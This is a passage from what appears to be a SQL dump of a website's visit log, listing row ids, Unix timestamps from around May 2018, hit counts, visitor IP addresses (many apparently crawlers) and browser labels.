,1,1,0,0,'217.69.133.9','other'),(237862,1525144623,1,1,0,0,'216.244.66.237','other'),(237863,1525144694,1,1,0,0,'180.76.15.149','other'),(237864,1525144890,1,1,0,0,'54.67.59.131','chrome'),(237865,1525145041,1,1,0,0,'54.36.148.233','other'),(237866,1525145396,1,1,0,0,'54.36.149.101','other'),(237867,1525145519,1,1,0,0,'46.0.23.91','msie'),(237868,1525145548,1,1,0,0,'216.244.66.237','other'),(237869,1525145697,1,1,0,0,'54.36.149.63','other'),(237870,1525145879,1,0,1,0,'66.249.66.76',''),(237871,1525146227,1,1,0,0,'37.9.113.151','other'),(237872,1525146271,1,1,0,0,'54.36.149.5','other'),(237873,1525146694,1,1,0,0,'180.76.15.147','other'),(237874,1525146709,1,1,0,0,'54.36.148.191','other'),(237875,1525146757,1,1,0,0,'54.36.148.163','other'),(237876,1525147160,1,1,0,0,'87.250.224.66','other'),(237877,1525147476,1,1,0,0,'54.36.149.6','other'),(237878,1525147614,1,1,0,0,'54.36.148.63','other'),(237879,1525147615,1,1,0,0,'54.36.148.162','other'),(237880,1525147661,10,10,0,0,'151.80.41.169','other'),(237881,1525147839,1,1,0,0,'66.249.66.157','chrome'),(237882,1525147901,1,1,0,0,'54.36.149.65','other'),(237883,1525147995,1,1,0,0,'54.36.148.66','other'),(237884,1525148174,1,1,0,0,'8.29.198.27','other'),(237885,1525148253,1,1,0,0,'54.36.148.122','other'),(237886,1525148267,1,1,0,0,'54.36.148.219','other'),(237887,1525148303,1,1,0,0,'54.36.148.215','other'),(237888,1525148330,1,0,1,0,'66.249.66.156',''),(237889,1525148472,1,1,0,0,'54.36.148.197','other'),(237890,1525148554,1,1,0,0,'217.69.133.226','other'),(237891,1525148622,1,1,0,0,'54.36.148.96','other'),(237892,1525148764,1,1,0,0,'54.36.148.210','other'),(237893,1525148855,1,1,0,0,'54.36.149.6','other'),(237894,1525148904,1,1,0,0,'37.9.113.56','other'),(237895,1525149265,1,1,0,0,'141.8.142.29','other'),(237896,1525149500,1,1,0,0,'216.244.66.237','other'),(237897,1525149595,1,1,0,0,'54.36.148.87','other'),(237898,1525149624,1,1,0,0,'54.36.148.95','other'),(237899,1525149676,1,1,0,0,'66.249.66.76','chrome'),(237900,1525150065,1,1,0,0,'37.9.113.60','other'),(237901,1525150124,1,1,0,0,'54.36.148.144','other'),(237902,1525150220,1,1,0,0,'54.36.148.122','other'),(237903,1525150350,1,1,0,0,'37.9.113.74','other'),(237904,1525150563,1,1,0,0,'54.36.149.61','other'),(237905,1525150709,1,1,0,0,'54.36.148.16','other'),(237906,1525150799,1,1,0,0,'54.36.148.100','other'),(237907,1525150997,1,1,0,0,'216.244.66.237','other'),(237908,1525151474,1,1,0,0,'37.9.113.82','other'),(237909,1525151477,1,1,0,0,'5.45.207.58','other'),(237910,1525151505,1,1,0,0,'54.36.148.153','other'),(237911,1525151553,1,1,0,0,'35.226.23.240','other'),(237912,1525151575,1,1,0,0,'54.36.148.209','other'),(237913,1525151724,1,1,0,0,'54.36.148.51','other'),(237914,1525151811,1,1,0,0,'54.36.148.127','other'),(237915,1525151917,1,1,0,0,'54.36.148.77','other'),(237916,1525152051,1,1,0,0,'207.46.13.180','other'),(237917,1525152158,1,1,0,0,'178.154.200.8','other'),(237918,1525152507,1,1,0,0,'54.36.148.226','other'),(237919,1525153019,1,0,1,0,'66.249.66.155',''),(237920,1525153275,1,1,0,0,'66.249.66.157','chrome'),(237921,1525153409,1,1,0,0,'8.29.198.26','other'),(237922,1525153473,1,1,0,0,'54.36.148.89','other'),(237923,1525153640,1,1,0,0,'216.244.66.237','other'),(237924,1525153687,1,1,0,0,'54.36.148.159','other'),(237925,1525153861,1,1,0,0,'178.154.171.24','other'),(237926,1525153868,1,1,0,0,'54.36.148.97','other'),(237927,1525153907,1,1,0,0,'54.36.148.102','other'),(237928,1525154275,1,1,0,0,'54.36.149.53','other'),(237929,1525154391,1,1,0,0,'54.36.149.48','other'),(237930,1525154434,1,1,0,0,'54.36.148.130','other'),(237931,1525154548,1,1,0,0,'54.165.59.7','other'),(237932,1525154559,1,1,0,0,'216.244.66.237','other'),(237933,1525154626,1,0,1,0,'66.249.66.75',''),(237934,1525154777,1,1,0,0,'54.36.149.12','other'),(237935,1525154946,1,1,0,0,'66.249.66.74','chrome'),(237936,1525154985,1,1,0,0,'54.36.148.213','other'),(237937,1525155097,1,1,0,0,'54.36.149.30','other'),(237938,1525155266,1,1,0,0,'54.36.148.225','other'),(237939,1525155298,1,1,0,0,'37.9.113.63','other'),(237940,1525155399,1,1,0,0,'54.36.148.41','other'),(237941,1525155454,1,1,0,0,'54.36.148.33','other'),(237942,1525155551,1,0,1,0,'66.249.66.157',''),(237943,1525155632,1,1,0,0,'54.36.148.186','other'),(237944,1525155640,1,1,0,0,'54.36.148.153','other'),(237945,1525155642,1,1,0,0,'54.36.148.117','other'),(237946,1525156158,1,1,0,0,'141.8.142.96','other'),(237947,1525156196,1,1,0,0,'54.36.149.91','other'),(237948,1525156205,3,3,0,0,'216.244.66.237','other'),(237949,1525156310,1,1,0,0,'54.36.148.240','other'),(237950,1525156393,1,1,0,0,'54.36.148.41','other'),(237951,1525156448,1,1,0,0,'54.36.148.10','other'),(237952,1525156540,1,1,0,0,'37.9.113.74','other'),(237953,1525156616,1,1,0,0,'54.36.148.131','other'),(237954,1525156663,1,1,0,0,'54.36.149.49','other'),(237955,1525156702,1,1,0,0,'35.226.23.240','other'),(237956,1525156834,1,1,0,0,'54.36.148.125','other'),(237957,1525157038,1,1,0,0,'54.36.148.144','other'),(237958,1525157158,3,3,0,0,'216.244.66.237','other'),(237959,1525157209,1,1,0,0,'54.36.148.148','other'),(237960,1525157630,1,1,0,0,'54.36.149.46','other'),(237961,1525157650,1,1,0,0,'54.165.59.7','other'),(237962,1525157882,1,1,0,0,'54.36.148.186','other'),(237963,1525157884,1,1,0,0,'54.36.148.68','other'),(237964,1525157887,1,0,1,0,'66.249.66.74',''),(237965,1525158065,1,1,0,0,'37.9.113.82','other'),(237966,1525158110,1,1,0,0,'54.36.148.176','other'),(237967,1525158129,1,1,0,0,'178.154.200.59','other'),(237968,1525158164,1,1,0,0,'54.36.148.215','other'),(237969,1525158170,1,1,0,0,'35.226.23.240','other'),(237970,1525158246,1,1,0,0,'54.36.148.245','other'),(237971,1525158756,1,1,0,0,'216.244.66.237','other'),(237972,1525158845,1,1,0,0,'54.36.148.125','other'),(237973,1525158946,1,1,0,0,'66.249.66.74','chrome'),(237974,1525159002,1,1,0,0,'8.29.198.27','other'),(237975,1525159323,1,1,0,0,'54.36.148.236','other'),(237976,1525159477,1,1,0,0,'54.36.148.235','other'),(237977,1525159556,1,1,0,0,'54.36.148.90','other'),(237978,1525159743,1,1,0,0,'54.36.148.106','other'),(237979,1525159941,1,1,0,0,'54.36.148.39','other'),(237980,1525160372,1,1,0,0,'66.249.66.156','chrome'),(237981,1525160470,1,1,0,0,'54.36.148.194','other'),(237982,1525160497,2,2,0,0,'92.113.126.46','chrome'),(237983,1525160513,1,1,0,0,'54.36.148.89','other'),(237984,1525160609,1,1,0,0,'54.36.149.106','other'),(237985,1525161061,1,1,0,0,'54.36.149.31','other'),(237986,1525161187,1,1,0,0,'54.36.148.126','other'),(237987,1525161213,1,1,0,0,'216.244.66.237','other'),(237988,1525161222,1,1,0,0,'54.36.148.182','other'),(237989,1525161230,1,1,0,0,'54.36.148.67','other'),(237990,1525161344,1,1,0,0,'54.36.148.114','other'),(237991,1525161480,1,1,0,0,'54.36.149.1','other'),(237992,1525161525,1,1,0,0,'54.36.149.21','other'),(237993,1525161650,1,1,0,0,'54.36.148.214','other'),(237994,1525161732,1,1,0,0,'54.36.148.176','other'),(237995,1525161847,1,1,0,0,'54.36.148.216','other'),(237996,1525162003,1,1,0,0,'54.36.148.86','other'),(237997,1525162326,1,0,1,0,'66.249.66.76',''),(237998,1525162390,1,1,0,0,'54.36.148.210','other'),(237999,1525162483,1,1,0,0,'216.244.66.237','other'),(238000,1525162540,1,1,0,0,'54.36.149.9','other'),(238001,1525162725,1,1,0,0,'54.36.148.235','other'),(238002,1525162729,1,1,0,0,'54.36.148.58','other'),(238003,1525162926,1,1,0,0,'54.36.148.194','other'),(238004,1525162964,1,1,0,0,'91.214.209.229','chrome'),(238005,1525163074,1,1,0,0,'54.36.149.42','other'),(238006,1525163186,1,1,0,0,'54.36.148.254','other'),(238007,1525163203,1,1,0,0,'54.36.149.96','other'),(238008,1525163433,1,1,0,0,'54.36.149.37','other'),(238009,1525163458,1,1,0,0,'54.36.148.200','other'),(238010,1525163503,1,1,0,0,'54.36.148.12','other'),(238011,1525163597,1,0,1,0,'66.249.66.155',''),(238012,1525163675,1,1,0,0,'54.36.148.235','other'),(238013,1525163687,1,0,1,0,'66.249.66.156',''),(238014,1525163847,1,1,0,0,'54.36.148.101','other'),(238015,1525163857,1,1,0,0,'54.36.148.251','other'),(238016,1525163912,1,0,1,0,'66.249.66.75',''),(238017,1525164001,1,1,0,0,'54.36.148.154','other'),(238018,1525164095,1,1,0,0,'54.36.149.18','other'),(238019,1525164251,1,1,0,0,'8.29.198.26','other'),(238020,1525164294,1,1,0,0,'54.36.148.226','other'),(238021,1525164318,1,1,0,0,'66.249.66.76','chrome'),(238022,1525164454,1,1,0,0,'54.36.148.128','other'),(238023,1525164483,1,1,0,0,'216.244.66.237','other'),(238024,1525164991,2,0,2,0,'66.249.66.155',''),(238025,1525165043,1,1,0,0,'54.36.148.194','other'),(238026,1525165062,1,0,1,0,'66.249.66.157',''),(238027,1525165091,1,1,0,0,'87.250.224.77','other'),(238028,1525165174,1,1,0,0,'54.36.149.37','other'),(238029,1525165414,1,1,0,0,'54.36.148.183','other'),(238030,1525165427,1,1,0,0,'54.36.149.44','other'),(238031,1525165494,1,1,0,0,'157.55.39.198','other'),(238032,1525165655,1,1,0,0,'54.36.149.67','other'),(238033,1525165807,1,1,0,0,'54.36.149.26','other'),(238034,1525165876,1,1,0,0,'54.36.148.24','other'),(238035,1525165907,1,1,0,0,'54.36.148.110','other'),(238036,1525166031,1,1,0,0,'54.36.148.147','other'),(238037,1525166069,1,1,0,0,'66.249.66.156','chrome'),(238038,1525166155,1,1,0,0,'54.36.148.105','other'),(238039,1525166244,1,1,0,0,'46.30.165.52','firefox'),(238040,1525166319,1,1,0,0,'54.36.148.104','other'),(238041,1525166446,1,1,0,0,'54.36.149.45','other'),(238042,1525166666,1,1,0,0,'54.36.149.91','other'),(238043,1525166951,1,1,0,0,'54.36.148.112','other'),(238044,1525167303,1,1,0,0,'216.244.66.237','other'),(238045,1525167323,1,1,0,0,'54.36.148.23','other'),(238046,1525167365,1,1,0,0,'54.36.149.81','other'),(238047,1525167438,1,1,0,0,'54.36.149.85','other'),(238048,1525167608,1,1,0,0,'54.36.148.226','other'),(238049,1525167817,1,1,0,0,'54.36.148.30','other'),(238050,1525168263,1,1,0,0,'54.36.149.21','other'),(238051,1525168387,1,1,0,0,'91.209.11.236','other'),(238052,1525168645,1,1,0,0,'54.36.148.48','other'),(238053,1525168840,1,1,0,0,'216.244.66.237','other'),(238054,1525168900,1,1,0,0,'54.36.149.80','other'),(238055,1525168965,1,1,0,0,'54.36.148.246','other'),(238056,1525168983,1,1,0,0,'54.36.148.73','other'),(238057,1525169508,1,1,0,0,'54.36.148.12','other'),(238058,1525169571,1,1,0,0,'54.36.148.59','other'),(238059,1525169604,1,1,0,0,'54.36.149.57','other'),(238060,1525169605,1,1,0,0,'54.36.148.63','other'),(238061,1525169674,1,1,0,0,'54.36.148.180','other'),(238062,1525169759,1,1,0,0,'66.249.66.74','chrome'),(238063,1525169835,1,1,0,0,'8.29.198.25','other'),(238064,1525170089,1,1,0,0,'54.36.148.162','other'),(238065,1525170238,1,1,0,0,'54.36.148.220','other'),(238066,1525170352,1,1,0,0,'54.36.149.46','other'),(238067,1525170367,1,1,0,0,'54.36.148.172','other'),(238068,1525170440,1,1,0,0,'216.244.66.237','other'),(238069,1525170574,1,1,0,0,'54.36.148.15','other'),(238070,1525170613,1,1,0,0,'54.36.149.3','other'),(238071,1525170666,1,1,0,0,'54.36.148.161','other'),(238072,1525170690,1,1,0,0,'141.8.142.134','other'),(238073,1525170825,1,1,0,0,'54.36.148.222','other'),(238074,1525170952,2,2,0,0,'91.196.178.15','chrome'),(238075,1525171037,1,1,0,0,'54.36.149.78','other'),(238076,1525171072,1,1,0,0,'91.224.179.35','chrome'),(238077,1525171218,1,1,0,0,'54.36.148.111','other'),(238078,1525171254,1,0,1,0,'66.249.66.75',''),(238079,1525171281,1,0,1,0,'66.249.66.157',''),(238080,1525171617,1,1,0,0,'66.249.66.156','chrome'),(238081,1525171677,1,1,0,0,'54.36.148.156','other'),(238082,1525171812,1,1,0,0,'54.36.148.45','other'),(238083,1525172139,1,1,0,0,'54.36.148.252','other'),(238084,1525172421,1,1,0,0,'54.36.148.39','other'),(238085,1525172493,1,0,1,0,'66.249.66.155',''),(238086,1525172765,1,1,0,0,'54.36.149.87','other'),(238087,1525173037,1,1,0,0,'5.45.207.49','other'),(238088,1525173270,1,1,0,0,'54.36.148.79','other'),(238089,1525173317,1,1,0,0,'54.36.148.80','other'),(238090,1525173598,1,1,0,0,'54.36.148.235','other'),(238091,1525173641,1,1,0,0,'54.36.148.22','other'),(238092,1525174183,1,1,0,0,'54.36.149.89','other'),(238093,1525174317,1,1,0,0,'54.36.148.229','other'),(238094,1525174617,1,1,0,0,'54.36.149.67','other'),(238095,1525174687,1,1,0,0,'216.244.66.237','other'),(238096,1525175045,1,1,0,0,'54.36.149.22','other'),(238097,1525175083,1,1,0,0,'54.36.148.57','other'),(238098,1525175092,1,1,0,0,'8.29.198.27','other'),(238099,1525175128,1,1,0,0,'54.36.148.73','other'),(238100,1525175164,1,1,0,0,'54.36.149.69','other'),(238101,1525175169,1,1,0,0,'54.36.149.104','other'),(238102,1525175319,1,1,0,0,'66.249.66.76','chrome'),(238103,1525175320,1,1,0,0,'54.36.148.55','other'),(238104,1525175622,1,1,0,0,'54.36.148.165','other'),(238105,1525175634,1,1,0,0,'54.36.148.222','other'),(238106,1525175761,1,1,0,0,'54.36.148.46','other'),(238107,1525175916,2,2,0,0,'216.244.66.237','other'),(238108,1525176139,1,1,0,0,'54.36.149.87','other'),(238109,1525176189,1,0,1,0,'66.249.66.155',''),(238110,1525176241,1,1,0,0,'54.36.148.83','other'),(238111,1525176274,1,1,0,0,'54.36.149.26','other'),(238112,1525176450,1,1,0,0,'54.36.149.104','other'),(238113,1525176497,1,1,0,0,'54.36.149.25','other'),(238114,1525176663,1,1,0,0,'54.36.148.81','other'),(238115,1525176841,1,1,0,0,'54.36.149.50','other'),(238116,1525176990,2,1,1,0,'66.249.66.156',''),(238117,1525177005,1,1,0,0,'54.36.148.137','other'),(238118,1525177120,1,1,0,0,'207.46.13.81','other'),(238119,1525177129,1,1,0,0,'54.36.149.97','other'),(238120,1525177133,1,1,0,0,'141.8.142.126','other'),(238121,1525177141,1,1,0,0,'54.36.148.238','other'),(238122,1525177318,1,1,0,0,'54.36.148.42','other'),(238123,1525177539,2,2,0,0,'216.244.66.237','other'),(238124,1525177710,2,2,0,0,'162.210.196.130','other'),(238125,1525177729,2,2,0,0,'78.85.4.67','other'),(238126,1525177866,1,1,0,0,'54.36.148.98','other'),(238127,1525178762,1,1,0,0,'54.36.148.218','other'),(238128,1525178992,1,1,0,0,'54.36.148.24','other'),(238129,1525179297,1,1,0,0,'54.36.149.0','other'),(238130,1525179432,1,1,0,0,'54.36.148.101','other'),(238131,1525179586,1,1,0,0,'54.36.148.83','other'),(238132,1525179736,1,1,0,0,'54.36.148.18','other'),(238133,1525179890,1,1,0,0,'82.207.22.237','firefox'),(238134,1525180015,1,1,0,0,'54.36.148.150','other'),(238135,1525180239,1,1,0,0,'54.36.148.191','other'),(238136,1525180263,1,1,0,0,'157.55.39.198','other'),(238137,1525180315,1,1,0,0,'54.36.148.168','other'),(238138,1525180395,1,1,0,0,'54.36.149.44','other'),(238139,1525180428,1,1,0,0,'66.249.66.76','chrome'),(238140,1525180543,1,1,0,0,'216.244.66.237','other'),(238141,1525180670,1,1,0,0,'8.29.198.25','other'),(238142,1525180710,1,1,0,0,'146.185.157.160','chrome'),(238143,1525180936,1,0,1,0,'66.249.66.156',''),(238144,1525180955,1,1,0,0,'54.36.148.54','other'),(238145,1525180968,1,1,0,0,'54.36.148.213','other'),(238146,1525180991,1,1,0,0,'54.36.148.173','other'),(238147,1525181034,1,1,0,0,'141.8.142.134','other'),(238148,1525181383,1,1,0,0,'54.36.149.53','other'),(238149,1525181490,1,1,0,0,'54.36.149.36','other'),(238150,1525181758,1,0,1,0,'66.249.66.76',''),(238151,1525181973,1,1,0,0,'54.36.148.245','other'),(238152,1525182014,1,1,0,0,'54.36.149.8','other'),(238153,1525182104,3,3,0,0,'216.244.66.237','other'),(238154,1525182148,1,1,0,0,'54.36.148.207','other'),(238155,1525182198,1,1,0,0,'5.45.207.49','other'),(238156,1525182247,1,1,0,0,'54.36.148.55','other'),(238157,1525182283,1,1,0,0,'54.36.148.153','other'),(238158,1525182290,1,1,0,0,'54.36.149.58','other'),(238159,1525182610,1,1,0,0,'54.36.148.38','other'),(238160,1525182740,1,1,0,0,'54.36.148.244','other'),(238161,1525182829,1,1,0,0,'54.36.149.37','other'),(238162,1525182886,1,1,0,0,'54.36.149.3','other'),(238163,1525182949,1,1,0,0,'180.76.15.154','other'),(238164,1525183157,1,1,0,0,'54.36.149.71','other'),(238165,1525183241,1,1,0,0,'54.36.148.37','other'),(238166,1525183407,1,1,0,0,'188.230.43.254','other'),(238167,1525183478,1,1,0,0,'54.36.148.112','other'),(238168,1525183533,1,1,0,0,'54.36.148.17','other'),(238169,1525183590,3,3,0,0,'216.244.66.237','other'),(238170,1525183659,1,1,0,0,'54.36.148.111','other'),(238171,1525183693,1,1,0,0,'54.36.149.29','other'),(238172,1525183782,1,1,0,0,'54.36.148.80','other'),(238173,1525183982,1,1,0,0,'54.36.148.129','other'),(238174,1525184541,1,1,0,0,'54.36.149.43','other'),(238175,1525184698,1,1,0,0,'54.36.149.89','other'),(238176,1525184862,1,1,0,0,'54.36.148.233','other'),(238177,1525184886,1,1,0,0,'54.36.148.237','other'),(238178,1525185030,1,1,0,0,'216.244.66.237','other'),(238179,1525185197,1,0,1,0,'66.249.66.156',''),(238180,1525185235,1,1,0,0,'54.36.148.110','other'),(238181,1525185374,1,1,0,0,'54.36.149.86','other'),(238182,1525185552,1,1,0,0,'54.36.148.243','other'),(238183,1525185570,1,1,0,0,'54.36.148.39','other'),(238184,1525185693,1,1,0,0,'66.249.66.157','chrome'),(238185,1525185803,1,1,0,0,'188.230.43.254','other'),(238186,1525185942,1,1,0,0,'8.29.198.26','other'),(238187,1525186089,1,1,0,0,'66.249.66.76','chrome'),(238188,1525186126,1,1,0,0,'141.8.142.123','other'),(238189,1525186130,2,2,0,0,'216.244.66.237','other'),(238190,1525186161,1,1,0,0,'54.36.148.190','other'),(238191,1525186438,1,1,0,0,'54.36.148.102','other'),(238192,1525186501,1,1,0,0,'54.36.148.199','other'),(238193,1525186664,1,1,0,0,'54.36.148.124','other'),(238194,1525186681,2,2,0,0,'54.36.148.245','other'),(238195,1525186748,1,1,0,0,'40.77.167.25','other'),(238196,1525186780,1,1,0,0,'54.36.149.45','other'),(238197,1525186972,1,1,0,0,'54.36.148.122','other'),(238198,1525187186,1,1,0,0,'54.36.148.81','other'),(238199,1525187228,1,1,0,0,'54.36.149.33','other'),(238200,1525187298,1,1,0,0,'54.36.149.63','other'),(238201,1525187445,1,0,1,0,'66.249.66.76',''),(238202,1525187745,1,1,0,0,'54.36.149.51','other'),(238203,1525187823,1,1,0,0,'54.36.149.85','other'),(238204,1525187880,1,1,0,0,'54.36.148.130','other'),(238205,1525187934,1,1,0,0,'188.230.43.254','other'),(238206,1525188154,1,1,0,0,'54.36.149.39','other'),(238207,1525188257,1,1,0,0,'54.36.149.87','other'),(238208,1525188447,1,1,0,0,'54.36.148.70','other'),(238209,1525188583,1,1,0,0,'54.36.148.79','other'),(238210,1525188817,1,1,0,0,'37.9.113.56','other'),(238211,1525188818,1,1,0,0,'54.36.148.241','other'),(238212,1525189017,1,1,0,0,'35.226.23.240','other'),(238213,1525189025,1,1,0,0,'180.76.15.151','other'),(238214,1525189317,1,1,0,0,'216.244.66.237','other'),(238215,1525189320,1,1,0,0,'54.36.149.83','other'),(238216,1525189418,1,1,0,0,'54.36.149.53','other'),(238217,1525189435,1,1,0,0,'54.36.149.24','other'),(238218,1525189653,1,1,0,0,'54.36.148.112','other'),(238219,1525189908,1,1,0,0,'54.36.149.43','other'),(238220,1525190073,1,1,0,0,'54.36.148.169','other'),(238221,1525190084,1,1,0,0,'54.36.148.146','other'),(238222,1525190355,1,1,0,0,'54.36.149.61','other'),(238223,1525190525,1,1,0,0,'35.226.23.240','other'),(238224,1525190608,1,1,0,0,'54.36.149.68','other'),(238225,1525190777,1,1,0,0,'54.36.148.113','other'),(238226,1525190817,1,1,0,0,'54.36.148.156','other'),(238227,1525190928,1,1,0,0,'216.244.66.237','other'),(238228,1525191096,2,2,0,0,'92.113.126.46','chrome'),(238229,1525191295,1,1,0,0,'66.249.66.76','chrome'),(238230,1525191375,1,1,0,0,'66.249.66.156','chrome'),(238231,1525191396,1,1,0,0,'54.36.148.104','other'),(238232,1525191506,1,1,0,0,'8.29.198.27','other'),(238233,1525191640,1,1,0,0,'54.36.148.47','other'),(238234,1525191808,1,0,1,0,'66.249.66.75',''),(238235,1525191922,1,1,0,0,'54.36.149.14','other'),(238236,1525192000,1,1,0,0,'54.36.149.48','other'),(238237,1525192110,1,1,0,0,'54.36.148.68','other'),(238238,1525192331,1,0,1,0,'66.249.66.74',''),(238239,1525192335,3,3,0,0,'216.244.66.237','other'),(238240,1525192933,1,1,0,0,'54.36.149.102','other'),(238241,1525192941,1,1,0,0,'35.226.23.240','other'),(238242,1525192959,1,1,0,0,'54.36.148.18','other'),(238243,1525193017,1,1,0,0,'54.36.148.11','other'),(238244,1525193121,2,0,2,0,'66.249.66.156',''),(238245,1525193215,1,1,0,0,'54.36.148.173','other'),(238246,1525193282,2,2,0,0,'54.36.149.103','other'),(238247,1525193565,1,1,0,0,'54.36.148.28','other'),(238248,1525193600,2,2,0,0,'216.244.66.237','other'),(238249,1525193834,1,1,0,0,'54.36.149.41','other'),(238250,1525193913,1,1,0,0,'54.36.148.116','other'),(238251,1525193998,1,1,0,0,'54.36.148.246','other'),(238252,1525194439,1,1,0,0,'54.36.148.150','other'),(238253,1525194448,1,1,0,0,'54.36.148.52','other'),(238254,1525194564,1,1,0,0,'54.36.148.20','other'),(238255,1525194839,1,1,0,0,'5.45.207.49','other'),(238256,1525194917,1,1,0,0,'54.36.148.174','other'),(238257,1525195189,1,1,0,0,'54.36.148.229','other'),(238258,1525195269,1,1,0,0,'54.36.148.127','other'),(238259,1525195276,1,1,0,0,'54.36.148.240','other'),(238260,1525195328,1,1,0,0,'188.255.104.163','firefox'),(238261,1525195486,1,1,0,0,'54.36.148.60','other'),(238262,1525195488,1,1,0,0,'141.8.142.134','other'),(238263,1525195526,1,1,0,0,'54.36.148.32','other'),(238264,1525195556,1,1,0,0,'54.36.149.82','other'),(238265,1525195646,1,1,0,0,'54.36.148.235','other'),(238266,1525196142,1,1,0,0,'54.36.148.71','other'),(238267,1525196148,1,1,0,0,'54.36.148.152','other'),(238268,1525196560,1,1,0,0,'54.36.148.37','other'),(238269,1525196687,1,1,0,0,'40.77.167.111','other'),(238270,1525196771,2,0,2,0,'66.249.66.157',''),(238271,1525196790,1,1,0,0,'8.29.198.26','other'),(238272,1525197092,1,1,0,0,'54.36.148.30','other'),(238273,1525197149,1,1,0,0,'54.36.148.140','other'),(238274,1525197154,2,2,0,0,'54.36.149.96','other'),(238275,1525197300,1,1,0,0,'54.36.148.254','other'),(238276,1525197339,1,1,0,0,'54.36.148.110','other'),(238277,1525197488,1,1,0,0,'54.36.148.243','other'),(238278,1525197796,1,0,1,0,'66.249.66.155',''),(238279,1525197814,1,1,0,0,'216.244.66.237','other'),(238280,1525197875,1,1,0,0,'141.8.142.126','other'),(238281,1525198059,1,1,0,0,'54.36.148.72','other'),(238282,1525198100,1,1,0,0,'91.196.178.133','chrome'),(238283,1525198233,1,1,0,0,'40.77.167.111','other'),(238284,1525198405,1,1,0,0,'54.36.149.82','other'),(238285,1525198443,1,1,0,0,'54.36.149.18','other'),(238286,1525198457,1,1,0,0,'54.36.148.130','other'),(238287,1525198462,1,1,0,0,'54.36.148.127','other'),(238288,1525198826,1,1,0,0,'216.244.66.237','other'),(238289,1525198932,1,1,0,0,'54.36.148.135','other'),(238290,1525198978,1,1,0,0,'54.36.148.100','other'),(238291,1525199054,1,1,0,0,'54.36.148.21','other'),(238292,1525199249,1,1,0,0,'54.36.148.252','other'),(238293,1525199305,1,1,0,0,'54.36.148.161','other'),(238294,1525199511,1,1,0,0,'54.36.149.58','other'),(238295,1525199652,1,1,0,0,'54.36.148.73','other'),(238296,1525199653,1,1,0,0,'54.36.148.13','other'),(238297,1525199774,1,1,0,0,'54.36.148.64','other'),(238298,1525199814,1,1,0,0,'54.36.148.182','other'),(238299,1525199944,1,0,1,0,'66.249.66.155',''),(238300,1525199955,1,0,1,0,'66.249.66.156',''),(238301,1525200289,1,1,0,0,'54.36.148.157','other'),(238302,1525200382,1,0,1,0,'66.249.66.157',''),(238303,1525200442,1,1,0,0,'54.36.149.24','other'),(238304,1525200467,1,1,0,0,'216.244.66.237','other'),(238305,1525200695,1,1,0,0,'54.36.148.147','other'),(238306,1525200889,1,1,0,0,'54.36.149.101','other'),(238307,1525200963,1,1,0,0,'54.36.148.103','other'),(238308,1525201235,1,1,0,0,'54.36.149.72','other'),(238309,1525201354,1,0,1,0,'66.249.66.157',''),(238310,1525201410,1,1,0,0,'54.36.148.76','other'),(238311,1525201416,1,1,0,0,'54.36.149.54','other'),(238312,1525201955,1,1,0,0,'54.36.148.202','other'),(238313,1525202067,1,0,1,0,'66.249.66.155',''),(238314,1525202143,1,1,0,0,'54.36.148.80','other'),(238315,1525202157,1,1,0,0,'54.36.148.89','other'),(238316,1525202299,1,1,0,0,'54.36.148.226','other'),(238317,1525202336,1,1,0,0,'8.29.198.26','other'),(238318,1525202362,1,1,0,0,'54.36.149.9','other'),(238319,1525202621,1,1,0,0,'54.36.149.19','other'),(238320,1525202758,1,1,0,0,'54.36.148.123','other'),(238321,1525202892,1,1,0,0,'188.190.92.45','chrome'),(238322,1525202909,1,1,0,0,'54.36.149.26','other'),(238323,1525203364,1,1,0,0,'54.36.148.33','other'),(238324,1525203370,1,1,0,0,'216.244.66.237','other'),(238325,1525203691,1,0,1,0,'66.249.66.156',''),(238326,1525203924,1,1,0,0,'37.9.113.60','other'),(238327,1525204030,1,1,0,0,'54.36.148.200','other'),(238328,1525204062,1,1,0,0,'54.36.148.124','other'),(238329,1525204097,1,1,0,0,'54.36.148.253','other'),(238330,1525204137,1,1,0,0,'163.172.4.153','other'),(238331,1525204206,1,1,0,0,'54.36.148.188','other'),(238332,1525204295,1,1,0,0,'54.36.148.86','other'),(238333,1525204353,1,1,0,0,'54.36.148.25','other'),(238334,1525204863,1,1,0,0,'54.36.148.53','other'),(238335,1525204892,1,1,0,0,'54.36.148.167','other'),(238336,1525204899,1,1,0,0,'54.36.148.21','other'),(238337,1525204902,1,1,0,0,'54.36.148.238','other'),(238338,1525204907,1,1,0,0,'54.36.148.237','other'),(238339,1525204983,1,1,0,0,'40.77.167.111','other'),(238340,1525205108,1,1,0,0,'216.244.66.237','other'),(238341,1525205381,1,1,0,0,'54.36.149.25','other'),(238342,1525205477,1,1,0,0,'54.36.148.152','other'),(238343,1525205498,1,1,0,0,'178.154.171.81','other'),(238344,1525205862,2,2,0,0,'54.36.148.119','other'),(238345,1525206051,1,1,0,0,'54.36.149.41','other'),(238346,1525206156,1,1,0,0,'54.36.149.70','other'),(238347,1525206206,1,1,0,0,'54.36.149.89','other'),(238348,1525206449,1,1,0,0,'216.244.66.237','other'),(238349,1525206497,1,1,0,0,'54.36.148.112','other'),(238350,1525206498,1,1,0,0,'54.36.149.38','other'),(238351,1525206656,1,1,0,0,'54.36.149.72','other'),(238352,1525207029,1,1,0,0,'54.36.148.193','other'),(238353,1525207047,1,1,0,0,'54.36.148.84','other'),(238354,1525207048,1,1,0,0,'54.36.148.164','other'),(238355,1525207171,1,1,0,0,'54.36.148.18','other'),(238356,1525207246,1,1,0,0,'54.36.148.137','other'),(238357,1525207317,1,1,0,0,'54.36.148.69','other'),(238358,1525207330,1,1,0,0,'54.36.148.119','other'),(238359,1525207370,1,1,0,0,'54.36.148.190','other'),(238360,1525207536,1,1,0,0,'54.36.148.168','other'),(238361,1525207605,1,1,0,0,'54.36.148.254','other'),(238362,1525207630,1,1,0,0,'8.29.198.25','other'),(238363,1525207636,1,1,0,0,'54.36.148.30','other'),(238364,1525207800,1,1,0,0,'54.36.148.250','other'),(238365,1525207828,1,1,0,0,'54.36.149.29','other'),(238366,1525207941,1,1,0,0,'54.36.148.133','other'),(238367,1525208041,1,1,0,0,'216.244.66.237','other'),(238368,1525208093,1,1,0,0,'54.36.148.55','other'),(238369,1525208267,1,1,0,0,'54.36.148.216','other'),(238370,1525208479,1,1,0,0,'54.36.148.23','other'),(238371,1525208698,1,1,0,0,'54.36.149.15','other'),(238372,1525208786,1,1,0,0,'54.36.149.107','other'),(238373,1525208875,1,1,0,0,'54.36.148.52','other'),(238374,1525208886,2,2,0,0,'93.74.100.126','chrome'),(238375,1525208960,1,1,0,0,'54.36.148.131','other'),(238376,1525209103,1,1,0,0,'157.55.39.198','other'),(238377,1525209292,1,1,0,0,